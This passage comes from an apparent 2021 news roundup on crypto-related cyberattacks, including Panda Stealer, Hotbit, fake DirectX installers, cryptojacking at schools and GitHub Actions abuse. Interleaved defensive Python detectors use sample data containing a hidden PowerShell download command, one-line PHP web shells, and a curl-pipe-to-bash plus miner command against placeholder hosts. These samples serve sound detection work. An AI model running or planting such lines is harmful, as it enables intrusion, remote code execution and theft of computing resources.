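              "powershell -w hidden -c \"iwr https://paste.ee/r/PLACEHOLDER\""),
    ProcEvent(102, "MSBuild.exe", "powershell.exe", "MSBuild.exe"),
    ProcEvent(103, "MSBuild.exe", "devenv.exe", "MSBuild.exe MyProject.csproj"),
    ProcEvent(104, "powershell.exe", "explorer.exe", "powershell"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print("ALERT", alert)
```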

Panda Stealer is a modification of the Collector Stealer (also known as DC Stealer) malware, which has been sold for as little as $12 on an underground marketplace and via Telegram. It is advertised as a "top-end information stealer" and has a Russian connection. Collector Stealer was cracked by a threat actor, NCP, identified as su1c1de. The cracked stealer and Panda Stealer behave alike but do not share the same URLs, tags, or execution files. 

“Cybercriminal groups and script kiddies alike can use it to create their customized version of the stealer and C2 panel,” Trend Micro researchers said. “Threat actors may also augment their malware campaigns with specific features from Collector Stealer.” 

Trend Micro says there are parallels to Phobos ransomware in the attack chain. In particular, its distribution method is identical to that of the Phobos "Fair" variant, as documented by Morphisec, which is continuously revised to cut down its footprint, for example by reducing its encryption criteria, so that it stays under the radar as long as possible.

Hotbit Shut Down all Services After a Cyberattack

 

After an alleged cyberattack on Thursday, cryptocurrency trading platform Hotbit has shut down all of its services. A note on the platform's website reads, “Hotbit just suffered a serious cyber-attack starting around 08:00 PM UTC, April 29, 2021, which led to the paralysation of a number of some basic services.”   

While the attackers were unable to gain access to Hotbit's wallets, they were able to penetrate the platform's user database. The Hotbit team advised customers to ignore all contact from people claiming to be members of the exchange. Hotbit also reported that pending trading orders have been cancelled to avoid losses while all regular activities are suspended during the ongoing maintenance. The exchange also agreed to cover any losses incurred by exchange-traded funds listed on its website during the maintenance period.

Before restoring servers and facilities, the exchange is looking for any evidence of tampering that may have contaminated its frequently backed-up data. Because of the time required to review backup data before the system restoration process can begin, customers were advised that the investigation and recovery could take anything from 7 to 14 days. 

According to the company, the attackers gained access to plaintext customer information (phone numbers, email addresses, and asset data) stored on Hotbit's servers. Although customers' passwords and 2FA keys were protected, the exchange advised users to change their passwords on all other websites where they had used the same credentials. 

Alex Zhou, Hotbit's chief security officer, told users on the exchange's Telegram group that customer funds were unaffected by the attack: “The attacker tried to break into the wallet server to steal funds but the action was identified and blocked successfully by Hotbit risk control system. All users’ funds are safe. At the same time, Hotbit is in the process of transferring all funds in hot wallet to cold wallet, the details of the whole integration could be seen on the chain.” 

Data from the Ethereum transaction tracking platform Etherscan shows multiple token outflows from one of Hotbit's known wallets to another address that currently holds around $14 million in various altcoins.

According to comments on social media and in the platform's Telegram forum, the length of time provided for the maintenance is causing considerable unrest among Hotbit users.

Fake Microsoft DirectX 12 Distributes Malware

 

Cybercriminals have built a bogus Microsoft DirectX 12 download page to spread malware that steals cryptocurrency wallets and passwords. Although the website has a contact form, a privacy policy, a disclaimer, and a DMCA infringement page, neither the website nor the software it distributes is legitimate.

When users press the Download buttons, they are routed to an external website that prompts them to download a file. Depending on whether the 32-bit or 64-bit edition is chosen, the file is called '6080b4 DirectX-12-Down.zip' [VirusTotal] or '6083040a Disclaimer.zip' [VirusTotal]. Both files deliver malware that attempts to steal files, passwords, and cryptocurrency wallets from its victims.

When the bogus DirectX 12 installers are launched, they silently download and execute malware from a remote site, as discovered by security researcher Oliver Hough. This malware is a data-stealing Trojan that tries to snatch a victim's cookies, directories, device records, installed programs, and even a snapshot of the current desktop. The malware authors are attempting to steal a number of Windows cryptocurrency wallet applications, including Ledger Live, Waves.Exchange, Coinomi, Electrum, Electron Cash, BTCP Electrum, Jaxx, Exodus, MultiBit HD, Atomic, and Monero. 

All of the information is gathered in a %Temp% folder, which the malware zips up and sends back to the attacker. The attacker then analyses the data and uses it for other nefarious purposes. To spread malware, threat actors are rapidly building fake websites, some of which are far more persuasive than others.

According to ESET, the Ficker malware is already spreading via websites impersonating the Microsoft Store and Spotify. The malware steals details and user accounts stored in web browsers, email applications, and FTP clients. It can even rob your bitcoin wallet, exfiltrate documents, and take screenshots of your running applications. 

As part of a larger campaign targeting cybersecurity experts, the Lazarus Group has set up a bogus security firm and social media accounts. The attackers built a website, as well as Twitter and LinkedIn accounts, for a fictitious Turkish business called SecuriElite. The firm purportedly offered offensive security services while Google's security team was tracking down the state-backed hackers.

Bitcoin Sinks Below the $50,000 Mark

 

Bitcoin and other cryptocurrencies lost a lot of value on Friday as investors worried that US President Joe Biden's plan to raise capital gains taxes would discourage investment in digital assets. The selloff followed news that the Biden administration was considering a raft of tax reform proposals, including a measure to nearly double capital gains rates to 39.6% for those making more than $1 million.  

Bitcoin, the world's largest and most successful cryptocurrency, dropped 7% to $48,176, slipping below $50,000 for the first time since early March, while smaller rivals Ether and XRP both fell about 10%. Markets were jolted by the tax plans, prompting investors to book gains in stocks and other risk assets, which had soared in anticipation of a strong economic rebound. Capital gains tax rates are expected to rise to new highs. 

"Bitcoin headed South today after President Biden signalled that he wanted to raise capital gains tax in the US," said Jeffrey Halley, senior market analyst, Asia Pacific, at OANDA. "Now whether that happens or not, many Bitcoin investors are probably sitting on some substantial capital gains if they stayed the course over the past year." 
"I firmly believe that developed market regulation and/or taxation remain the crypto markets' Achilles Heel," he added. 

Bitcoin is set to lose 15% this week, but it is still up 65 percent from the beginning of the year. Ether fell more than 10% on the day to as low as $2,107 (roughly Rs. 1.5 lakhs), despite climbing to a new high of $2,645.97 (roughly Rs. 2 lakhs) the day before. 

"I don't think Biden's taxes plans will have a big impact on Bitcoin," said Ruud Feltkamp, CEO at automated crypto trading bot Cryptohopper. "Bitcoin has only gone up for a long time, it is only natural to see a consolidation. Traders are simply cashing in on winnings." 

"There are reasons to believe the overall trend will remain bullish unless the price drops below $40k," said Ulrik Lykke, executive director at crypto hedge fund ARK36. "At the moment, we are not convinced that the trend will reverse into a bear market but we acknowledge it may take some time before the demand overtakes the supply again in the medium to short term."

Cryptojacking Spree: Targeting Washington State Educational Institutions

 

According to a new advisory released by Palo Alto Networks' Unit 42 team, cryptojacking incidents have recently taken place against educational institutions in Washington State. Threat actors are targeting educational institutions in the United States, intending to compromise their networks and mine cryptocurrency covertly. 

Known as cryptojacking, this form of cyberattack sees attackers use deception tactics to install cryptocurrency mining components that leech off computational power without being noticed or detected. 

On February 16, cybersecurity researchers discovered the first attack, which consisted of a malicious HTTP request sent to a domain owned by an educational institution. Security teams initially mistook it for a trivial command injection flaw, but it turned out to be a command for a web shell backdoor that attackers used to gain access to the institution's network. 

In this form of attack, attackers use various types of miner software to try to generate cryptocurrencies such as Monero, Litecoin, Bitcoin, and Ethereum. Attackers typically compromise a large number of systems to make the attacks lucrative and bring in more cryptocurrency. 

The researchers say that a UPX-packed cpuminer -- used to mine LTC and BTC -- was delivered via the malicious traffic. 

If deployment succeeds, the backdoor can then call and execute the crypto mining payload. The malware also downloads a mini shell that masquerades as a wp-load.php file. "Since the mini shell is not moved elsewhere, we speculate that the current directory of the mini shell, as well as the backdoor, is a web directory exposed to the internet," the report states. 

Cryptocurrency mined on infected systems is sent to two wallets owned by the operators (1, 2). Two other incidents showed some differences in user agent strings, pass values, and algorithms, but the general attack method remained the same. 
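Because the report places both the mini shell and the packed miner in an internet-exposed web directory, a periodic sweep of the document root can surface this kind of compromise. The following is an added example, not Unit 42's code: it builds a constructed sample tree in a temporary directory and flags UPX-packed ELF binaries and PHP files that either carry the wp-load.php decoy name outside the document root or pass request parameters straight into code execution. The file names and the detection patterns are assumptions.

```python
"""Sweep a web root for the cryptojacking artefacts described above.

Added example (not Unit 42's code). Findings are returned as (path, reason)
tuples so the caller can feed them to a ticketing or alerting pipeline.
"""
import os
import re
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

# A web shell typically hands a request parameter directly to an execution sink.
SHELL_PATTERN = re.compile(
    rb"(eval|system|passthru|shell_exec)\s*\(\s*\$_(POST|GET|REQUEST)")


def is_upx_packed_elf(data: bytes) -> bool:
    """True for an ELF image that still carries the UPX packer marker."""
    return data[:4] == b"\x7fELF" and b"UPX!" in data


def suspicious_php(path: Path, webroot: Path, data: bytes) -> Optional[str]:
    # WordPress ships exactly one wp-load.php, at the document root.
    if path.name == "wp-load.php" and path.parent != webroot:
        return "wp-load.php outside the document root (mini shell decoy name)"
    if SHELL_PATTERN.search(data):
        return "request parameter passed to code execution (web shell)"
    return None


def sweep(webroot: Path) -> List[Tuple[str, str]]:
    findings = []
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            p = Path(dirpath) / name
            data = p.read_bytes()
            rel = p.relative_to(webroot).as_posix()
            if is_upx_packed_elf(data):
                findings.append((rel, "UPX-packed ELF in web directory"))
            elif p.suffix == ".php":
                reason = suspicious_php(p, webroot, data)
                if reason:
                    findings.append((rel, reason))
    return sorted(findings)


def build_sample_tree() -> Path:
    """Constructed sample web root: a legitimate core file, two planted PHP
    files in the uploads directory and a fake UPX-packed miner binary."""
    root = Path(tempfile.mkdtemp())
    (root / "wp-load.php").write_bytes(b"<?php require __DIR__ . '/wp-config.php';")
    (root / "index.php").write_bytes(b"<?php echo 'hello';")
    uploads = root / "wp-content" / "uploads"
    uploads.mkdir(parents=True)
    (uploads / "wp-load.php").write_bytes(b"<?php eval($_POST['pass']);")
    (uploads / "img.php").write_bytes(b"<?php system($_GET['cmd']);")
    (uploads / "minerd").write_bytes(b"\x7fELF" + b"\x00" * 60 + b"UPX!" + b"\x00" * 100)
    (uploads / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n")
    return root


if __name__ == "__main__":
    for rel_path, reason in sweep(build_sample_tree()):
        print(f"{rel_path}: {reason}")
```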

"The malicious request [...] exhibits several similarities," Unit 42 noted. "It's the same attack pattern delivering the same cpuminer payload against the same industry (education), suggesting it's likely the same perpetrator behind the cryptojacking operation."

An analysis of K-12 schools across the United States, published in March, found that 2020 was a "record-breaking" year for cybersecurity incidents. Over 400 incidents were reported in the study, including ransomware, phishing attempts, website defacement, and denial-of-service (DoS) attacks.

Crypto at Risk After Facebook Leak: Here’s how Hackers Can Exploit Data

 

Tech giant Facebook has been hit with yet another data leak, but this time the number of users whose records were exposed was not 50 million but a massive 500 million. 

According to a security analyst, sensitive personal information for over half a billion Facebook users was leaked on a well-trafficked hacking forum on April 3, posing a danger to millions of cryptocurrency traders who may now be susceptible to SIM swapping and other identity-based attacks.

What should be done? 

Asked how exactly this latest breach puts individuals' crypto assets at risk, Dave Jevans, CEO of blockchain security firm CipherTrace, told Cointelegraph that people whose phone numbers have been leaked need to be extra careful, because a lot of fraud involving digital assets hinges on such details. 

He further added, “We’ve seen an increase in SIM swaps, phishing attacks, and other types of fraud involving cryptocurrencies that rely on acquiring the phone numbers of victims to execute. Leaked info about the identity of high-profile crypto users gave bad actors the ability to target them.” 

Ben Diggles, co-founder and chief revenue officer at Constellation, told Cointelegraph that Facebook's latest security lapse is unsurprising, especially given that most Facebook users take a different approach, preferring their world to be managed and structured for them. 

“Those that are crypto holders that were on the list have little to worry about unless they were storing descriptive details of their holdings and access on their Facebook account. However, these hackers have gotten really sophisticated, so I have no idea what tricks they may have [up] their sleeves with regards to scraping info specific to crypto wallets and exchanges,” he added. 

However, he suggests that most users should update their passwords for all of their social media profiles, as well as all other sites that share their data with Facebook, as a precaution. 

Does decentralization matter? 

As more data leaks occur, a large majority of people around the world are understanding the value proposition that decentralized systems offer in terms of protection, particularly, since they do not feature a single point of failure. 

On the matter, Eli Arkush, a cloud solutions engineer at cybersecurity firm GlobalDots, suggests that having a platform's backend system distributed using blockchain technology could make it more difficult for hackers to obtain user information; however, once credentials fall into the wrong hands, password reuse may become a concern. 

However, Stephen Wilson, the CEO of Lockstep Group and a member of the Australian government's National Blockchain Roadmap Cybersecurity Working Group, believes that, contrary to popular belief, storing personal information on any blockchain ecosystem is never a good idea. He pointed out that the type of personal data breached by Facebook should never be stored in a blockchain, and even if it is, such data can never be completely protected by blockchain in the long run.

“Blockchain and DLTs usually only decentralize some aspects of data management. They don’t usually decentralize data storage in any relevant sense because they tend to duplicate ledger entries across multiple systems. The storage is distributed, but identical copies of information are available in multiple locations and can be vulnerable to attackers or thieves,” he further added. 

Most hacking schemes in the past have primarily focused on stealing funds from cryptocurrency exchanges. For example, in 2014 and 2018, the total amount of money compromised as a result of exchanges being hacked was $483 million and $875 million, respectively. 

However, an increasing number of offenders are focusing their attention on stealing user data because it provides them with unique opportunities to obtain funds quickly. As a result, cryptocurrency owners must protect their assets.

Goodbye Cryptocurrencies: Number of 'Dead' Coins Increased by 35% Over Last Year

 

Coinopsy.com, an online firm that tracks dead cryptocurrencies, has published a data report on the number of dead crypto coins. The report shows a huge surge in the number of dead cryptocurrencies, coins that yielded minimal to zero profit for anyone. 

According to the Coinopsy.com report, the number increased by 35% over last year to 1,949. Around February last year, the total number of dead coins had exceeded 1,440. The term "dead coin" refers to a cryptocurrency that no longer exists, for any of several reasons: it was a scam, its website is down, there’s a problem with a node or wallet, it’s illiquid, it was simply abandoned, or it was halted by its developer. 

If there is no information on why a coin died, it falls into the default "deserted" category. The growth in the number of dead coins gained momentum in 2017, when many entrepreneurs and firms launched initial coin offerings (ICOs), raising $4.9 billion over the year, according to Crunchbase. ICOs are meant to fund new blockchain-based cryptocurrencies or related apps or companies.

According to CoinMarketCap, ICOs increased the number of existing coins from 29 to more than 850 projects in 2017. By December last year, the total number of cryptocurrencies had reached close to 8,000. As of March 3, 2021, there were 9,108 cryptocurrencies in circulation, led by Bitcoin and Ethereum. However, many of these coins no longer exist because they were scams, jokes, or were never developed.

Joke projects and coins have no real or concrete idea behind them, yet they still seek investment. For example, according to CoinMarketCap, the Useless Ethereum Token (UET) was one such joke coin that held an ICO and raised over $300,000. The total market capitalization of over 9,000 cryptocurrencies is $1.96 trillion, of which Bitcoin commands a 60 percent share ($1.1 trillion) and Ethereum an 11% share ($243 billion).

Attackers found abusing GitHub Infrastructure to Mine Cryptocurrency

 

Microsoft-owned GitHub is the latest cyberattack victim, with reports of cybercriminals manipulating GitHub's cloud infrastructure to mine cryptocurrency. The code repository hosting service has started an investigation into a series of attacks aimed at abusing its infrastructure to mine cryptocurrency illegally. 

GitHub Actions is a continuous integration (CI) and continuous deployment (CD) solution that makes it easy to automate software workflows and set up periodic tasks. The attack adds malicious GitHub Actions code to repositories forked from legitimate ones and then creates a Pull Request asking the original repository's maintainers to merge the code back, altering the original code. 

“In a phone call, Dutch security engineer Justin Perdok told The Record that at least one threat actor is targeting GitHub repositories where Actions might be enabled. The attack involves forking a legitimate repository, adding malicious GitHub Actions to the original code, and then filing a Pull Request with the original repository in order to merge the code back into the original.” reported The Record. 

“But the attack doesn’t rely on the original project owner approving the malicious Pull Request. Just filing the Pull Request is enough for the attack, Perdok said.” This is particularly true for GitHub projects that have automated workflows set up to validate incoming Pull Requests via Actions. As soon as a Pull Request is created against the original project, GitHub's systems execute the attacker's code, which instructs GitHub servers to retrieve and run a crypto miner. 
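Since merely filing the Pull Request is enough, the defensive check has to happen before any workflow is allowed to run: look at whether the PR touches workflow definitions at all, and what the changed steps would execute. The following is an added example, not GitHub's or the researchers' code; the changed-files dictionary, the sample PR and the pattern list are constructed assumptions, and the hosts in the sample are placeholders.

```python
"""Pre-run review check for pull requests that alter GitHub Actions workflows.

Added example (not GitHub's code). Every changed file under
.github/workflows/ is reported, even with no findings, because a workflow
change from a fork needs human review before Actions runs it; steps that
fetch-and-execute remote content or reference a miner are called out.
"""
import re
from typing import Dict, List

WORKFLOW_DIR = ".github/workflows/"

# Illustrative patterns a mining workflow step would commonly contain.
RISKY_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"),
     "downloads and pipes a script into a shell"),
    (re.compile(r"stratum\+tcp://"), "connects to a mining pool"),
    (re.compile(r"\b(xmrig|cpuminer|minerd)\b", re.IGNORECASE),
     "references a known miner binary"),
]


def audit_workflow(text: str) -> List[str]:
    """One finding per workflow line that matches a risky pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern, why in RISKY_PATTERNS:
            if pattern.search(line):
                findings.append(f"line {lineno}: {why}")
                break
    return findings


def audit_pull_request(changed_files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each changed workflow file (path -> new content) to its findings."""
    report = {}
    for path, content in changed_files.items():
        if path.startswith(WORKFLOW_DIR):
            report[path] = audit_workflow(content)
    return report


# Constructed pull request: a benign README tweak plus a tampered CI workflow.
SAMPLE_PR = {
    "README.md": "# project\nFixed a typo.\n",
    ".github/workflows/ci.yml": "\n".join([
        "name: CI",
        "on: [pull_request]",
        "jobs:",
        "  build:",
        "    runs-on: ubuntu-latest",
        "    steps:",
        "      - uses: actions/checkout@v2",
        "      - run: make test",
        "      - run: curl -s https://example.invalid/setup.sh | bash",
        "      - run: ./xmrig -o stratum+tcp://pool.invalid:3333",
    ]),
}

if __name__ == "__main__":
    for path, findings in audit_pull_request(SAMPLE_PR).items():
        print(path, "->", findings or "workflow changed; manual review required")
```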

This isn't the first time GitHub Actions has been abused this way. An identical attack had previously been identified by another developer, Yann Esposito, in which an attacker filed a malicious Pull Request against Esposito's GitHub project. 

Last year, BleepingComputer reported on GitHub being used to host the wormable botnet Gitpaste-12, which reappeared with over 30 exploits the following month. Unlike Gitpaste-12 or the Octopus Scanner malware, which targeted vulnerable projects and computers, this attack appears to be solely abusing GitHub servers for crypto mining.

In an email, GitHub told The Record that they are “aware of this activity and are actively investigating”. For now, the attack does not appear to damage users’ projects in any way and seems to be solely focused on abusing GitHub infrastructure.

UK Cryptocurrency Exchange EXMO Suffers a 'Massive' DDoS Assault

 

Cryptocurrency exchange EXMO, a British company, was targeted in a distributed denial-of-service (DDoS) attack. As a precautionary measure, the company temporarily shut down its servers. The company said in a notification that it suffered the DDoS attack on February 15, when its website was offline for two hours.

EXMO’s spokesperson said that previous DDoS assaults had affected only the website, but this attack was different in its potency and its capability to drive 30 GB of traffic per second, affecting the whole network, including the website, API, WebSocket API, and exchange charts. The assault was combated with the help of DDoS protection provider Qrator, and the company has also beefed up its security to avoid further damage. 

This was the second assault on the company in two months: on December 24, threat actors attacked the company and stole about 5% of EXMO’s total assets from its ‘hot’ wallets. The company later confirmed a loss of about $4 million in customer cryptocurrency. There is currently no proof of the motives behind either attack, but it is suspected that, with the bitcoin price hitting record highs, threat actors tried to cash in on the higher value of the stolen assets.

EXMO released an update regarding the developments in an investigation wherein they mentioned, “Our team is currently developing a new infrastructure for hot wallets. Since each blockchain needs a separate server, the process will take some time, once deposits and withdrawals are available, you will have to generate a new wallet address in the ‘Wallet’ section of your account. Our investigation is ongoing, and we are taking all necessary and precautionary measures to prevent such incidents from reoccurring.” 

The company was launched in 2013 and is headquartered in London. Due to Britain’s exit from the European Union, EXMO had chosen to establish new European bases as part of a contingency plan. The company was registered with the UK Financial Conduct Authority (FCA) as a crypto asset business on a temporary basis until July 9th, 2021, following a request submitted in April 2020. 

EXMO has expanded its reach outside the UK in a very short span of time and the company’s offices are in Kyiv, Barcelona, Moscow, and Istanbul.